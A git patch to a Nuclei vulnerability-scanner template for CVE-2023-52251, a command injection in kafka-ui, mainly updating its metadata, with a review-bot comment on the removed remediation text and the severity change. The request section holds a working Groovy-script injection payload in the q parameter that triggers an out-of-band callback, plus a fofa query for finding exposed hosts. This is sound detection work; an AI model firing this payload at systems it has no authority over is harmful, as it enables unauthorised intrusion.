From 55b1e930ef0a77b3dc5389ebcfce0479ab9028e4 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 14 Mar 2024 15:48:27 +0530
Subject: [PATCH] Update CVE-2023-52251.yaml

---
 http/cves/2023/CVE-2023-52251.yaml | 33 ++++++++++++++++++------------
 1 file changed, 20 insertions(+), 13 deletions(-)

diff --git a/http/cves/2023/CVE-2023-52251.yaml b/http/cves/2023/CVE-2023-52251.yaml
index 85d518d9f6..84e54aaa0b 100644
--- a/http/cves/2023/CVE-2023-52251.yaml
+++ b/http/cves/2023/CVE-2023-52251.yaml
@@ -1,25 +1,32 @@
 id: CVE-2023-52251
 
 info:
-  name: kafka-ui - RCE
+  name: Kafka UI 0.7.1 Command Injection
   author: yhy0
-  severity: critical
+  severity: high
   description: |
-    Remote Code Execution vulnerability provectus/kafka-ui.
-  remediation: |
-    Do not expose to the Internet
+    An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
   reference:
     - https://github.com/BobTheShoplifter/CVE-2023-52251-POC
     - https://github.com/provectus/kafka-ui
+    - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
+    - https://github.com/nomi-sec/PoC-in-GitHub
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2023-52251
+    cwe-id: CWE-94
+    epss-score: 0.02881
+    epss-percentile: 0.90497
+    cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
   metadata:
-    max-request: 3
-    fofa-query: icon_hash="-1477045616"
     verified: true
-  tags: cve,cve2023,rce,kafka,kafka-ui
+    max-request: 3
+    vendor: provectus
+    product: ui
+    framework: kafka
+    fofa-query: icon_hash="-1477045616"
+  tags: packetstorm,cve,cve2023,rce,kafka,kafka-ui
 
 http:
   - method: GET
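Review bot: The `remediation` block is removed on the new side with nothing put in its place, so the template now states the affected range (0.4.0 through 0.7.1) but no longer gives the reader any action to take; consider keeping a short entry such as `remediation: |` followed by `Upgrade to a release that addresses CVE-2023-52251; until then, do not expose the Kafka UI API to untrusted networks.` The new `cvss-metrics` vector carries PR:L, while the new description speaks of "remote attackers" without mentioning any required privilege; the two presumably come from different sources, so it is worth confirming they describe the same attack path before the severity downgrade from critical to high is accepted. Both `name` and the packetstorm reference pin the title to 0.7.1 while the description covers a range, so the name could read `Kafka UI 0.4.0 - 0.7.1 Command Injection` for consistency with the description.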
@@ -27,7 +34,7 @@ http:
       - "{{BaseURL}}/api/clusters"
       - "{{BaseURL}}/api/clusters/{{cluster}}/topics?showInternal=true&search=&orderBy=NAME&sortOrder=ASC"
       - "{{BaseURL}}/api/clusters/{{cluster}}/topics/{{topic}}/messages?q=new%20URL%28%22http%3A%2F%2F{{interactsh-url}}%22%29.text&filterQueryType=GROOVY_SCRIPT&attempt=2&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING"
-
+
     matchers-condition: and
     matchers:
       - type: dsl
@@ -36,19 +43,19 @@ http:
           - 'contains(body, "status\":\"online")'
           - 'status_code == 200'
         condition: and
-
+
       - type: dsl
         dsl:
           - 'contains(content_type, "application/json")'
           - 'contains(body, "name")'
           - "status_code == 200"
         condition: and
-
+
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-
+
     extractors:
       - type: json
         name: cluster